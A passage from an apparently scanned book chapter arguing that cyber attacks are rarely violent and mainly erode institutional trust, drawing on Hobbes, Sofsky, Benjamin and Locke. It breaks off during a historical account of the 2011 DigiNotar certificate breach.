first. Only then can the key questions be tackled: what is violence in the 
context of cyber attacks? Does the notion of violence change its meaning 
when it is applied to cyberspace? The answer therefore depends on where 
a line is drawn between a violent act and a non-violent act, and on what 
we consider to be violence and what we do not consider as violence. This 
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understanding of violence also forms the foundation for our understan¬ 
ding of political, economic, military, and especially ethical considera¬ 
tions of all cyber attacks, be they violent or otherwise. 

This chapter puts forward a simple argument with a twist: most cyber 
attacks are not violent and cannot sensibly be understood as a form of 
violent action. And those cyber attacks that actually do have the poten¬ 
tial of force, actual or realized, are bound to be violent only indirectly. 
Violence administered through cyberspace is less direct in at least four 
ways: it is less physical, less emotional, less symbolic, and, as a result, less 
instrumental than more conventional uses of political violence. Yet cyber 
attacks, be they non-violent or in very rare cases violent, can achieve the 
same goal that political violence is designed to achieve: namely, to 
undermine trust, and specifically collective social trust in specific insti¬ 
tutions, systems, or organizations. And cyber attacks may undermine 
social trust, paradoxically, in a more direct way than political violence, 
by taking a non-violent shortcut. Moreover, they can do so by remaining 
entirely invisible. 

The argument is outlined in four short steps. The chapter starts by 
considering the various media through which violence can be expressed. 
Secondly the crucial role of the human body in committing as well as 
receiving acts of violence will be discussed. The chapter then briefly cla¬ 
rifies the concept of violence, in juxtaposition to power, authority and, 
most importantly, force, highlighting the symbolic nature of instruments 
of force. The argument finally discusses trust and the most important 
limitation as well as the most important potential of cyber attacks. 

Violence is conventionally administered in one of three ways— 
through force, through energy, or through agents. A new fourth medium 
is code, which is bound to be more indirect—if it is to be included as a 
separate medium at all. The first two categories are borrowed from phy¬ 
sics, the third from chemistry and biology. The first instance—force—is 
the most obvious. In physics, force is described as an influence that 
changes the motion of a body, or produces motion or deformation in a 
stationary object. The magnitude of force can be calculated by multi¬ 
plying the mass of the body by its acceleration, and almost all weapons 
combine physical mass with acceleration, be it a fist, a stone, a pike, a 
bullet, a grenade, even a missile. The second medium—energy—is 
perhaps somewhat less obvious at first glance, but is almost as old as the 
use of mechanical force to coerce, hurt, or kill other human beings. Fire, 
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heat, and explosions are used as powerful and highly destructive media 
of violence. SunTzu, the ancient Chinese author of The Art of War, had 
a chapter on “attack by fire.” 1 Less common uses of energy at war 
include the use of electricity, for instance in Tasers, or lasers. Agents are 
the third medium of violence. Some weapons rely neither on physical 
force nor on energy, but on agents to do the work of harming the target. 
The most obvious examples are biological weapons and chemical wea¬ 
pons—after all, such agents do not have to be fired in an artillery shell 
or missile, which physically thrusts them into a target perimeter to deli¬ 
ver the deadly payload. The agent does the harm. Weaponized agents 
impair the human organism and lead to injury or death: anthrax, endo- 
spores that cause respiratory infection, and in a high number of infec¬ 
tions ultimately respiratory collapse; mustard gas, a chemical agent, 
causes blisters, burns, and is strongly carcinogenic. 

Any discussion of violence in the context of cyber attacks needs to 
start by recognizing some basic philosophical insights. In contrast to 
almost all instruments that may be used for violent effect, code differs 
in two notable ways. The first basic limitation is that code-caused vio¬ 
lence is indirect: it has to “weaponize” the target system in order to turn 
it into a weapon. Code doesn’t have its own force or energy. Instead, any 
cyber attack with the goal of physical destruction, be it material destruc¬ 
tion or harming human life, has to utilize the force or energy that is 
embedded in the targeted system or created by it. Code, quite simply, 
doesn’t come with its own explosive charge. Code-caused destruction is 
therefore parasitic on the target. Even the most sophisticated cyber attack 
can only physically harm a human being by unleashing the violent 
potential that is embedded in that targeted system. This could be a traf¬ 
fic control system, causing trains or planes to crash; a power plant that 
may explode or emit radiation; a dam that may break and cause a devas¬ 
tating flash flood; a pipeline that may blow up; hospital life support 
systems that may collapse in emergency situations; or even a pacemaker 
implanted in a heart patient that could be disrupted by exploiting vulne¬ 
rabilities in its software. Yet so far, no such scenario has ever happened 
in reality. Lethal cyber attacks, while certainly possible, remain the stuff 
of fiction novels and action films. Not a single human being has ever 
been killed or hurt as a result of a code-triggered cyber attack. 

Computer code can only directly affect computer-controlled machines, 
not humans. At first glance the way a biological virus harms a system 
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may be compared to the way a computer virus—or other malware— 
harms a computer system. Jurgen Kraus, a German student, coined this 
metaphoric comparison, and the term computer virus itself, in 1980. 
In his MA dissertation, “Reproduktion bei Programmen,” Kraus argued 
that self-reproducing programs would be inconsequential if they did 
not reside inside the memory of a computer: “Only inside the compu¬ 
ter, and only if the program is running, is a self-reproducing program 
in a position for reproduction and mutation.” 2 Kraus then pointed to 
an important difference: a biological virus could start its own reproduc¬ 
tive process, but a computer virus would rely on activation through the 
operating system. The most crucial difference was so obvious to Kraus 
that he didn’t have to mention it: biological viruses can only affect 
biological systems; computer viruses can only affect machines that rely 
on code. Put simply, a biological virus cannot directly harm a building 
or vehicle, and a computer virus cannot directly harm a human being 
or animal. 

Finally, one special hypothetical case of a parasitic cyber attack should 
be mentioned. Many modern weapon systems, from artillery guns to 
naval drones, are controlled by software, by computer code. An 
increasing number of such systems will be equipped with varying 
degrees of autonomous decision-making capabilities in the future. The 
International Committee of the Red Cross has recognized this trend and 
has already started considering possible adaptations to the law of armed 
conflict. Yet caution is warranted. Code that is a built-in component of 
a weapon system should not be seen as part of a cyber attack—otherwise 
the concept would lose its meaning: every complex weapon system that 
uses computers in one way or the other would then count as a form of 
cyber attack. That would not make sense. But there is one exception: an 
automated complex weapon system becoming the target of a breach. If 
weaponized code can only unlock physical destruction by modifying a 
targeted system, then the perfect target system is one that gives the attac¬ 
ker maximum flexibility and maximum potential for damage: in theory, 
an armed remotely controlled aircraft, such as a Predator or Reaper 
drone, is a far more attractive target for a cyber attack than a power 
plant or an air-traffic control system. In such a scenario, the aggressor 
would not merely weaponize a clunky system that was never designed to 
be a weapon—the attackers could actually “weaponize” a weapon. In 
practice, however, such an episode has never happened and indeed is 
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difficult to imagine. The only incident on record that comes close to 
such an attack occurred in late June 2012: researchers from the Univer¬ 
sity of Texas at Austin’s Radionavigation Laboratory hijacked a small 
surveillance drone during a test-flight in a stadium in Austin, Texas. The 
academics “spoofed” the drone’s GPS system by infiltrating the 
machine’s navigation device with a signal that was more powerful than 
the one received from satellites used for legitimate GPS navigation. This 
meant that the scholars could override the drone’s commands and thus 
control its flight path. The device they used allegedly cost only $1,000 
to build, Fox News reported. 3 A far better-known incident is a questio¬ 
nable example: in the first days of December 2011, a CLA-operated 
American Lockheed Martin RQ-170 Sentinel drone fell into Iranian 
hands near the city of Kashmar, in the country’s north-east. An anony¬ 
mous Iranian engineer who worked on analyzing the captured drone 
claimed that electronic warfare specialists had spoofed the drone’s GPS 
navigation. 4 After a ten-week review of the incident the CIA reportedly 
found that a faulty data stream had caused operators to lose contact with 
the drone, rather than Iranian interference or jamming. 5 While spoofing 
is technically possible, it is very unlikely that such an attack could suc¬ 
ceed against a more complex armed military drone in the field: the 
controls are likely to be encrypted, altitude can be a problem, and decei¬ 
ving a GPS receiver is not the same as infiltrating the control system that 
can unleash a military drone’s deadly missiles against specified targets. 

The human body, the previous pages argued, is not directly vulnerable 
to cyber attack, only indirectly. But the human body, in several ways, is 
the foundation of violence. It enables both the act of attacking and of 
being attacked. Understanding this foundational role of the human 
body is necessary to see the emotional limitations of code-borne vio¬ 
lence, as well as the symbolic limitations of cyber attack. 

Taking the human body as the starting point for political theory has 
a long tradition, especially among political philosophers concerned with 
the phenomenon of violence and how to overcome it. The human body’s 
vulnerability is its most notable feature in most such considerations of 
political theory. Thomas Hobbes and his reflections on the vulnerability 
of the unprotected human existence probably come to mind first. The 
driving force for all political organization is the universal weakness of all 
humans and their resulting dependence on protection. The opening 
paragraph of Chapter 13 of Leviathan deserves to be read in full: 
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Nature has made men so equall, in the faculties of body, and mind; as that 
though there bee found one man sometimes manifestly stronger in body, 
or of quicker mind then another; yet when all is reckoned together, the 
difference between man, and man, is not so considerable, as that one man 
can thereupon claim to himselfe any benefit to which another many not 
pretend, as well as he. For so as to the strength of the body, the weakest has 
the strength enough to kill the strongest, either by secret machination, or 
by confederacy with others, that are in the same danger with himselfe. 6 

This equalizing vulnerability forms the conceptual basis for Hobbes’s 
famous state of the war of all against all, and the normative basis for the 
social contract to overcome the resulting “natural” state of anarchy. This 
state of war, and the absence of political order, prevents all meaningful 
social development and civilization. The consequence, in Hobbes’s most 
famous words, would be “continuall feare, and danger of violent death,” 
which would inevitably make the life of man “solitary, poore, nasty, 
brutish, and short.” 7 Self-help, therefore, needed to be rejected and vio¬ 
lence taken away from man, monopolized, 8 and given to the collective, 
the “commonwealth.” It is important to note that this basic insight 
forms the continued foundation of most contract theory, legal theory, 
and indeed the modern notion of the state. 9 

Wolfgang Sofsky, a more recent German political theorist, is also 
noteworthy in this context. The political philosopher wrote a highly 
inspiring work about violence, entitled Traktat uber die Gewalt (Pam¬ 
phlet on Violence). 10 The book is especially useful in the context of the 
present inquiry because, like cyber attacks, it ignores the state’s frontiers, 
and does not limit itself to internal or external violence. For Sofsky, 
whether domestically or internationally, the body is the center of human 
existence. It is because of man’s bodily existence that all humans are 
verletzungmachtig, able to hurt, and verletzungsoffen, able to be hurt. 11 
The body, in other words, is the first instrument of violence, and it is the 
first target of violence. The two sides—the active and the passive; aggres¬ 
sion and protection; offense and defense—will be considered in turn. 

The body is the first and foremost target of violence. Even if more 
advanced weapons are designed to destroy buildings, bunkers, or barri¬ 
cades, their ultimate aim always remains the human body. Appreciating 
this foundation is crucial. The experience of physical violence at the 
hands of a criminal or an enemy is a life-changing event for the survivor 
that transcends the moment of aggression. It stays with the victim. 
Sofsky puts this in drastic but appropriate language. Somebody else’s 
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death may leave a painful hole in the social fabric of a family, village, or 
country. But the situation is different for the survivor of a violent attack. 
Depending on the attack’s intensity, the victim has made personal 
acquaintance with a life-changing event, with possibly permanent inju¬ 
ries, physical as well as psychological ones. Sofsky: 

Pain is the material portend of death, and fear [of pain] is ultimately only 
an offspring of the fear of death. Pain forces man to feel what ceases to be 
felt in death, the tenuousness of the body, the destruction of the mind, the 
negation of existence. The survivor knows this in his flesh. He feels that 
dying has begun . 12 

Violence, like serious illness, confronts individuals with the fragility 
of their existence, with the proximity of death. Anyone who has spent 
time in a war zone, even if they were spared a personal encounter with 
violence, understands this existential dimension. The strong bonds of 
friendship forged in war zones are an expression of this existential and 
highly emotional experience. Individual violence can literally break 
down an individual, cause irreversible trauma, and end his or her exis¬ 
tence—political violence, likewise, can break down a political commu¬ 
nity, cause deep collective trauma, and even upend its existence entirely. 
Therefore, Sofsky concluded, “no language has more power to persuade 
than the language of force.” 13 

From this follows the second major limitation: violence administered 
through cyberspace is not only indirect and mediated; it is also likely to 
have less emotional impact. Due to its intermediary and roundabout 
nature, a cyber attack is unlikely to release the same amount of terror 
and fear as a coordinated campaign of terrorism or conventional military 
operations would produce. A coordinated cyber attack that produces a 
level of pain that could sensibly be compared to that which a well-exe¬ 
cuted air campaign can inflict on a targeted country is plainly unimagi¬ 
nable at present. 14 And here a comparison with airpower may be 
instructive: the use of airpower has historically been overestimated again 
and again, from the Second World War to Vietnam to the Persian Gulf 
War to the Kosovo campaign to Israel’s 2006 war against Hezbollah. In 
each instance the proponents of punishment administered from the air 
overestimated the psychological impact of aerial bombardments and 
underestimated the adversary’s resilience—and it should be noted that 
being bombed from the air is a most terrifying experience. 15 Against this 
background of consistent hopefulness and overconfidence, it is perhaps 
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not surprising that it was air forces, not land forces, that first warmed to 
“cyber” and started to maintain that their pilots would now “fly, fight 
and win” 16 in cyberspace, the much-vaunted “fifth domain of warfare,” 17 
next to land, sea, air, and space. The use of cyber weapons that could 
inflict damage and pain comparable to the pummeling of Dresden, Lon¬ 
don, Belgrade, or Beirut at the receiving end of devastating airpower is, 
at present, too unrealistic even for a bad science fiction plot. 

When the first casualty is caused by a cyber attack—and a “when” 
seems to be a more appropriate conjunction than an “if” here—there is 
no question that the public outcry will be massive, and depending on 
the context, the collective fear could be significant. But after the initial 
dust has settled, the panic is likely to subside and a more sober assess¬ 
ment will be possible. The likely finding will be that, to paraphrase 
Sofsky, in cyberspace the language of force just isn’t as convincing. Ano¬ 
ther reason for the limitations of instruments of violence in cyberspace, 
or cyber weapons, is their symbolic limitation. To appreciate the symbo¬ 
lism of weapons, the key is again the body. 

The body is also the first instrument of violence, the first weapon. Here 
the “first” doesn’t indicate a priority, but the beginning of an anthropo¬ 
logical and ultimately a technical development that is still in full force. 
Three things are constantly increasing: the power of weapons, the skills 
needed to use them, and the distance to the target. Needless to say, it is 
the deadly ingenuity of the human mind that devised most weapons and 
optimized the skills needed to use them and to build them. Yet it was 
the bare body that was man’s first weapon, and all instruments of vio¬ 
lence are extensions of the human body. Examples of simple weapons, 
such as a club, a knife, or a sword, can help illustrate this unity between 
user and instrument. Martial artists trained in the delicate techniques of 
fencing or kendo, a Japanese form of sword-fighting, will intuitively 
understand that the purpose of intensive training, mental as well as 
physical, is to make the weapon’s use as natural as the use of one’s arms 
or legs, and vastly more efficient. Hence expressions such as “going into 
the weapon,” “becoming one” with it, or “feeling” it. Such expressions 
are not just familiar to fencers, archers, or snipers. The unity between 
the fighter and his or her weapon is not limited to the relatively simple, 
traditional instruments of harm. It also applies to more complex weapon 
systems. The E-15 pilot or the artillery gunner equally accumulate large 
numbers of hours in flight or on range in order to routinize the use of 
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these instruments of harm. The goal is that the pilot does not have to 
think about the basics any more, even in more complex maneuvers 
under high stress, and instead is able to focus on other aspects of an 
operation. The plane, ultimately, becomes an extension of the pilot’s 
body as well. And the more complex a weapon, the more its use becomes 
the prerogative of specialists in the use of force who are trained to ope¬ 
rate it. 

Technology affects the relationship between violence and the human 
body in an uneven way: technology drastically altered the instruments 
of violence—but technology did not alter the foundation, the ultimate 
vulnerability of the human body. Technology can physically remove the 
perpetrator from the inflicted violence, but technology cannot physically 
remove the victim from the inflicted violence. If the bare human body 
is the instrument of harm, it is a fist or foot that will hit the victim’s 
body. If the instrument of harm is a blade, the knife will cut the victim’s 
skin. An arrow will hit its victim’s shoulder from a small distance. A 
sniper’s bullet will tear tissue from hundreds of yards. A shell’s detona¬ 
tion will break bones from miles away. A long-range missile can kill 
human beings across thousands of miles, continents away. Man can 
delegate the delivery of violence to an artifact, to weapon systems, but 
the reception of violence remains an intimately personal, bodily expe¬ 
rience. The complexity, the precision, and the destructive power of 
weapon systems, as well as the degree of specialization of those operating 
them, have been growing continuously. 

This ever-increasing power of offensive weapons highlights the sym¬ 
bolic role of instruments of violence—and the third major limitation: 
using cyber weapons for symbolic purposes. The well-trained body of a 
boxer or wrestler is a symbol of his or her strength, even outside the 
ring, outside a fight. The sword is traditionally used as a symbol of glory, 
martial prowess, and social status. Showing weapons, consequently, 
becomes a crucial part of their use and justification. In Yemen, for ins¬ 
tance, the jambeeya, a traditional dagger worn like a giant belt-buckle, 
is still a man’s most visible symbol of social standing. In New York City 
and elsewhere, a police officer with a holstered gun imposes more res¬ 
pect than an unarmed sheriff. In Beijing, military parades are perhaps 
the most obvious spectacle literally designed to show the state’s imposing 
power. There is even an entire range of military operations largely exe¬ 
cuted for the purpose of display. Examples can be found on strategic and 
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tactical levels: deploying major assets, such as a carrier strike group, at 
strategically significant points, or merely a patrol, be it marching, dri¬ 
ving, sailing, or flying. 18 Most explicitly, airpower may be deployed in 
so-called “show of force” operations, such as a deliberately low flyover 
by a military aircraft, designed to intimidate the enemy tactically. As the 
power of weapons increases along with the required skills of their users 
and the distance they can bridge, the need for symbolism increases as 
well: displaying weapon systems and threatening their use, in many 
situations, becomes more cost-efficient than using them. Politically and 
ethically the symbolic use of weapons is also strongly preferable. Nuclear 
weapons are the most extreme expression of this trend. But cyber assets 
are different. Showing the power of cyber weapons is vastly more diffi¬ 
cult than showing the power of conventional weapons, especially if the 
purpose is to administer a threat of force, not actually using force itself. 
Exploit code cannot be paraded on the battlefield in a commanding 
gesture, let alone displayed in large city squares on imposing military 
vehicles. In fact, publishing dangerous exploit code ready to be 
unleashed (say, for the sake of the argument, on the DoD’s website) 
would immediately lead to patched defenses and thus invalidate the 
cyber weapon before its use. Using cyber weapons, for instance to fire a 
warning shot in the general direction of a potential target once for a 
show-of-force operation, comes with a separate set of problems. The 
next chapter will explore some of these limitations in more detail. The 
argument here is that displaying force in cyberspace is fraught with 
novel and unanticipated difficulties. 

So far, three limitations of violence in cyberspace have been intro¬ 
duced: code-induced violence is physically, emotionally, and symboli¬ 
cally limited. These limitations were straightforward and highlighting 
them did not require significant conceptual groundwork. This is dif¬ 
ferent for both the most significant limitation of cyber attacks 19 and 
their most significant potential. To bring both into relief, a more solid 
conceptual grounding in the political thought on violence is required. 
(Note to readers: this book caters to a diverse audience, those interested 
in conflict first and in computers only second, and to those interested 
primarily in new technologies and their impact on our lives. For readers 
from either group, political theory may not be the first reading choice. 
Yet especially those readers with a practical bent are encouraged to 
engage with the following pages. These conceptual considerations are 
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not introduced here as a scholarly gimmick. Indeed theory shouldn’t be 
left to scholars; theory needs to become personal knowledge, conceptual 
tools used to comprehend conflict, to prevail in it, or to prevent it. Not 
having such conceptual tools is like an architect lacking a drawing 
board, a carpenter without a metering rule, or, indeed, a soldier without 
a rifle.) 

Political violence is always instrumental violence, violence administe¬ 
red (or threatened) in the service of a political purpose, and that purpose 
is always to affect relationships of trust. Violence can either be used to 
establish and to maintain trust, or it can be used to corrode and to 
undermine trust. Terrorism, for instance, is a means to undermine a 
society’s trust in its government. Violence can be used to maintain or 
re-establish trust, for instance by identifying and arresting criminals (or 
terrorists), those who broke the social contract by using force against 
other citizens and their property. The political mechanic of violence has 
two starkly contrasting sides, a constructive and a destructive side, one 
designed to maintain trust, the other designed to undermine trust. The 
two are mutually exclusive, and will be considered in turn. Only then 
can the utility of cyber attacks be considered respectively. 

A brief word on trust is necessary here. Trust is an essential resource 
in any society. 20 Perhaps because of this towering significance, trust and 
trustworthiness are highly contested concepts in political theory. Because 
trust is so important yet so abstract and contested, concisely defining the 
use of the term is crucial for the purposes of the present argument. 
Political thought distinguishes between two rather different kinds of 
trusting: trust should first be understood as an interpersonal relationship 
between two individuals. 21 Examples are the kind of trust relationships 
that exist between me and my brother, between you and your plumber, 
or between a customer and a taxi driver. Such relationships of trust are 
always directed towards an action: my brother may trust me to take care 
of his daughter while he’s away; you trust your plumber to fix the 
bathroom boiler while you are at work; and a traveler trusts the cabbie 
to go the right way and not rob them. The second kind of trust refers to 
a collective attribute rather than to an individual’s psychological state: 
the trust that individuals collectively place into institutions. 22 Such an 
institution can be a bank, a solicitor, an airline, the police, the army, the 
government, or more abstract entities like the banking system or the 
legal order more generally. Again, such relationships of institutional 
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trust are related to an activity or service: customers trust their bank not 
to steal money from them, they trust airlines to maintain and operate 
planes properly, and citizens trust the police to protect them when 
necessary. At second glance, interpersonal trust and institutional trust 
are connected. You are likely to trust your plumber not because he’s such 
a trustworthy person per se, but because you know that law enforcement 
in England or France or Germany is set up in a way that, if he betrays 
your trust, he will face legal punishment. Something similar applies to 
the taxi ride. Consequently, an astute traveler looking out for a taxi ride 
across Cairo just after the 2011 revolution, with law and order having 
partly collapsed, is likely to place far less trust into the orderly behavior 
of a random cab driver. This means that trustworthy and stable legal 
institutions only enable interpersonal trust between individuals who 
may represent those institutions or be bound by them. 23 

Focusing on trust significantly broadens the horizon of the analysis of 
political violence. At the same time it offers a more fine-grained perspec¬ 
tive on the purpose of an attack, and this increased resolution is espe¬ 
cially useful when looking at various kinds of cyber attacks. The goal of 
an attack—executed by code or not, violent or not—may be more 
limited than bringing down the government or challenging its legiti¬ 
macy in a wholesale fashion. Not all political violence is revolutionary, 
not all activists are insurgents, and not all political attacks are violent. 
The goal of an attack may be as distinct as a specific policy of a specific 
government, a particular business practice of a particular corporation, 
or the reputation of an individual. 

Violence, in the hands of the established order, is designed to main¬ 
tain social trust. To appreciate the depth of this insight, consider three 
well-established maxims of political theory. First, violence is an implicit 
element of even the most modern legal order. Any established political 
order comes with a certain degree of violence built-in—consolidated 
states, after all, are states because they successfully maintain a monopoly 
over the legitimate use of force. Any legal order, to use the language of 
jurisprudence, is ultimately a coercive order. 24 One of the most inspiring 
writers on this subject is Alexander Passerin d’Entreves, a twentieth- 
century political philosopher from the multi-lingual Aosta Valley in the 
Italian Alps. In his book, The Notion of the State, the political philoso¬ 
pher discusses the state and its use of force at length. “The State ‘exists’ 
in as far as a force exists which bears its name,” he wrote, referring to the 
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tacit nature of the potential threat of force that is the subtext and foun¬ 
dation of any rule of law. “The relations of the State with individuals as 
well as those between States are relations of force.” 25 One of Hobbes’s 
most famous quotes captures this tacit presence of force in the authority 
of the law, “Covenants, without the sword, are but words.” 26 

This tacit violence, secondly, becomes power. And it is trust that turns 
violence into power. To be more precise: social trust, ultimately, relies on 
the functioning of the rule of law, and the rule of law in turn relies on 
the state effectively maintaining and defending a monopoly of force, 
internally as well as externally. This thought may appear complex at first 
glance, but it forms the foundation of the modern state. In fact this 
question is at the root of much of a vast body of political theory, a body 
of literature dedicated, in Passerin d’Entreves’s words, to the long and 
mysterious ascent that leads from force to authority, to asking what 
transforms “force into law, fear into respect, coercion into consent— 
necessity into liberty.” It is obviously beyond the capacity of the present 
analysis to go into a great level of detail here. But a short recourse to a 
few of the most influential political thinkers will help make the case that 
trust is a critically important concept. Again Hobbes: 

The Office of the sovereign, be it a monarch or an assembly, consisteth in 
the end, for which he was trusted with the sovereign power, namely the 
procuration of the safety of the people . 27 

Collective trust in the institutions of the state is one of the features 
that turn violence into power. John Locke, a philosopher of almost 
equal standing to Hobbes in the history of Western political thought, 
captured this dynamic eloquently. For Locke, trust is an even more 
central concept: 

[PJolitical power is that power which every man having in the state of 
Nature has given up into the hands of the society, and therein to the 
governors whom the society hath set over itself, with this express or tacit 
trust, that it shall be employed for their good and the preservation of their 
property . 28 

Force, when it is used by the sovereign in order to enforce the law, 
ceases to be mere violence. By representing the legal order, force becomes 
institutionalized, “qualified” in Passerin d’Entreves’s phrase, “force, by 
the very fact of being qualified, ceases to be force” and is being transfor¬ 
med into power. 29 
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Thirdly, political violence—whether in its raw form or in its tacit, 
qualified form as power—is always instrumental. “Violence can be 
sought only in the realm of means, not of ends,” wrote Walter Benja¬ 
min, an influential German-Jewish philosopher and literary critic. His 
essay, Critique of Violence, published in the author’s native German as 
Kritik der Gewalt in 1921, is a classic in the study of violence. 30 Benja¬ 
min also pointed to a fundamentally constitutional character of vio¬ 
lence, its “lawmaking” character. “People give up all their violence for 
the sake of the state,” Benjamin writes, in agreement with realist politi¬ 
cal theorists and positivist legal thought. 31 He then distinguishes 
between a “law-preserving function” of violence and a “lawmaking 
function” of political violence. 32 

While there is some consensus on a theory of war, and certainly on a 
theory of law, there is little consensus on a theory of violence—although 
both war and law employ force and ultimately violence. Perhaps not 
surprisingly, a significant amount of political thought on violence—like 
on war and law—comes from philosophers and political thinkers who 
were German, or at least German-speaking. The German word for vio¬ 
lence is Gewalt. This is not surprising for two reasons: one, because the 
country’s history was exceptionally violent, especially during the nine¬ 
teenth and the first half of the twentieth century, when most landmark 
texts were written. Its authors include Karl Marx, Max Weber, Walter 
Benjamin, Hannah Arendt, and Carl Schmitt, all of whom wrote clas¬ 
sics in sociology and political science. But it also includes authors like 
Carl von Clausewitz, who wrote one of the founding texts of the theory 
of war, On War, and Hans Kelsen, whose oeuvre includes one of the 
founding texts of jurisprudence, The Pure Theory of Law. Gewalt, a word 
that does not translate directly into English, plays a key role in all of 
these texts. It is indeed a forceful concept. This leads to the other reason 
for the prevalence of German authors in this field: the German language 
“qualifies” violence from the start—or more precisely, it never disquali¬ 
fied Gewalt, it never distinguished between violence, force, and power. 
Gewalt can be used as in Staatsgewalt, the power of the state, or as in 
Gewaltverbrechen, violent crime. These basic concepts of classical politi¬ 
cal theory bring into relief the most important limitation as well as the 
most important potential of cyber attacks. 

The utility of cyber attacks—be they violent or non-violent—to esta¬ 
blish and maintain trust is crucially limited. First, violent cyber attacks, 
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or the threat of violent cyber attacks, are unlikely to ever be an implicit 
part of a legal order. Neither espionage, nor sabotage or subversion, has 
the potential to maintain let alone establish a coercive order. Domestic 
surveillance may be used as a supplemental and highly controversial tool 
for that purpose, but not as the actual instrument of coercion. From this 
follows, secondly, that the notion of “cyberpower,” properly defined, is 
so shaky and slippery as to be useless. The notion of Cybergewalt , in 
other words, doesn’t make a lot of sense at present. Hence, thirdly, code- 
borne violence is hugely limited in its instrumentality: it has little to no 
trust-maintaining potential, and may only contribute to undermining 
trust. This limiting insight at the same time points to the most signifi¬ 
cant potential of cyber attacks: cyber attacks can achieve similar or better 
effects in a non-violent way. 

Political violence is also a means of eroding trust. The perpetrators of 
political violence, especially in its most extreme form, terrorism, almost 
always clamor for publicity and for media attention, even if no group 
claims credit for an attack. The rationale of maximum public visibility is 
to get one crucial statement across to the maximum number of reci¬ 
pients: see, your government can’t protect you, you can’t trust the state 
to keep you safe. This logic of undermining a government’s trustwor¬ 
thiness applies in two scenarios that otherwise have little in common. 
One is indiscriminate terrorist violence where random civilians are the 
victims, including vulnerable groups, such as the elderly, women, and 
children. All political violence, but especially the most brutal indiscrimi¬ 
nate kind, also sends a message that is likely to cross the militants’ inte¬ 
rest: we don’t discriminate, we’re brutal, we don’t respect the life of 
innocents. But in the heat of violent internal conflict, the utility of 
progressively undermining the population’s trust in the government 
outweighs these reputational costs. The other scenario is regular, state- 
on-state war. When one country’s army goes to war against another 
country’s armed forces, one of the key objectives is to undermine the link 
between the population and its own government. That link is a form of 
institutional trust. Clausewitz famously described the population as one 
of the three elements of a “fascinating trinity” (the other elements being 
the government and the army). The population, the Prussian philoso¬ 
pher of war wrote, is the source of passion and the energy that is required 
to sustain a nation’s war effort. Therefore, if the majority of the popula¬ 
tion loses faith in its government’s and army’s ability to prevail, then 
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public opinion and morale will collapse. This dynamic does not just 
apply to democracies, but to all political systems, albeit in different ways. 
Modern armed forces, not unlike militant groups, are therefore seeking 
to maximize the public visibility of their superior firepower. 33 In both 
regular and irregular conflict, for generals and terrorists, one of the main 
goals is to convince opinion leaders in a country’s wider population that 
their present regime will be unable to resurrect and maintain its mono¬ 
poly of force—either externally or internally. 

Cyber attacks can undermine an institution’s trustworthiness in a 
non-violent way. Here the context matters greatly. Of course the use of 
political violence is not the only way to undermine trust in a govern¬ 
ment, an institution, a policy, a company, or somebody’s competence. It 
is not even the most common method, nor is it the most efficient or 
most precise one. Violence is merely the most extreme form of political 
attack. In liberal democracies, such as the United States, most forms of 
non-violent political activism and protest are not just legal, but are also 
considered legitimate, especially in hindsight, for instance the civil rights 
movement in the United States. But even extreme forms of activism and 
political speech are protected by the American Constitution’s First 
Amendment. 34 In less liberal political communities, certain forms of 
non-violent political activism will be illegal. The more illiberal a system, 
the more non-violent dissent will be outlawed (the chapter on subver¬ 
sion below will explore this problem in more detail). 

Cyber attacks, both non-violent as well as violent ones, have a signi¬ 
ficant utility in undermining social trust in established institutions, be 
they governments, companies, or broader social norms. Cyber attacks 
are more precise than conventional political violence: they do not neces¬ 
sarily undermine the state’s monopoly of force in a wholesale fashion. 
Instead they can be tailored to specific companies or public sector orga¬ 
nizations and used to undermine their authority selectively. The logic of 
eroding trust by means of cyber attack is best illustrated with examples. 
Four examples will help extract several insights. 

The first and most drastic is the DigiNotar case, a hacking attack on 
a computer security company. DigiNotar used to be a leading certificate 
authority based in the Netherlands, initially founded by a private lawyer 
in cooperation with the official body of Dutch civil law notaries. Certi¬ 
ficate authorities issue digital certificates, and DigiNotar was founded to 
do so for the Dutch government as well as commercial customers. In 
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cryptographic terms, the certificate authority is a so-called trusted third 
party, often abbreviated as TTP, and effectively acts as a provider of trust 
between two other parties. It does so by certifying the ownership of a 
public key by the named “subject” (the owner) of the certificate. A 
browser usually displays the presence of a certified website by a small 
green lock or other green symbol on the left side of the browser’s address 
bar. All mainstream browsers were configured to trust DigiNotar’s certi¬ 
ficates automatically. Significantly, some of the Dutch government’s 
most widely used electronic services relied on certificates issued by the 
compromised firm, for example the country’s central agency for car 
registration, Rijksdienst voor het Wegverkeer, or DigiD, an identity 
management platform used by the Dutch Tax and Customs Administra¬ 
tion to verify the identity of citizens online by using the country’s natio¬ 
nal identification number, the Burgerservicenummer. Given the nature of 
DigiNotar’s services as a certificate authority—trust was its main pro¬ 
duct—it was by definition highly vulnerable to cyber attack. 

That attack happened on 10 July 2011. 35 The self-styled “Comodo 
Hacker” gained access to the firm’s computer systems and, over the next 
ten days, issued more than 530 fraudulent certificates, including certifi¬ 
cates pretending to be from Google, Skype, and Mozilla, but also from 
major Western intelligence agencies, such as the CIA, the Mossad, and 
the British MI6. 36 Nine days later, on 19 July, DigiNotar’s staff had 
detected an intrusion into its certificate infrastructure, but the firm did 
not publicly disclose this information at the time. The company revoked 
all the fraudulent certificates it detected, about 230 in total, but that 
meant that it failed to revoke more than half of the fraudulent certifi¬ 
cates. 37 At least one certificate was then used for so-called man-in-the- 
middle attacks against users of Gmail and other encrypted Google 
services. By intercepting the traffic between Google and the user, 
unknown attackers were able to steal passwords and everything else that 
these unsuspecting users typed or stored in their account. The Dutch 
security firm did not usually issue certificates for the Californian search 
giant. But the fact that Google had no business relationship with the 
issuer of the certificate did not make the attack any less effective—all 
mainstream browsers, from Firefox to Chrome to Internet Explorer, 
accepted DigiNotar’s faked certificate as credible anyway. Only six weeks 
later, on Saturday, 27 August, one user in Iran noticed something was 
wrong. Alibo, as he chose to call himself, was running the latest version 
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of Google’s Chrome browser and noticed an unusual warning when he 
checked his emails on Gmail. Just two months earlier, in May 2011, 
Google added the “public key pinning” feature to its browser. This 
meant that Google essentially “hard-coded” fingerprints for its own web 
services into Chrome. Chrome then simply ignored contrary informa¬ 
tion from certificate authorities, and displayed a warning to users. 38 
Alibo saw this warning and posted a question on a Google forum that 
Saturday, “Is this MITM to Gmail’s SSL?” he asked in broken geek jar¬ 
gon, referring to a man-in-the-middle attack and a common encryption 
format, secure socket layer. 39 

The reaction came quickly. After all, this was the first time that the 
malicious use of a fake certificate on the Internet had come to light, as 
was pointed out by the Electronic Prontier Poundation, a group that 
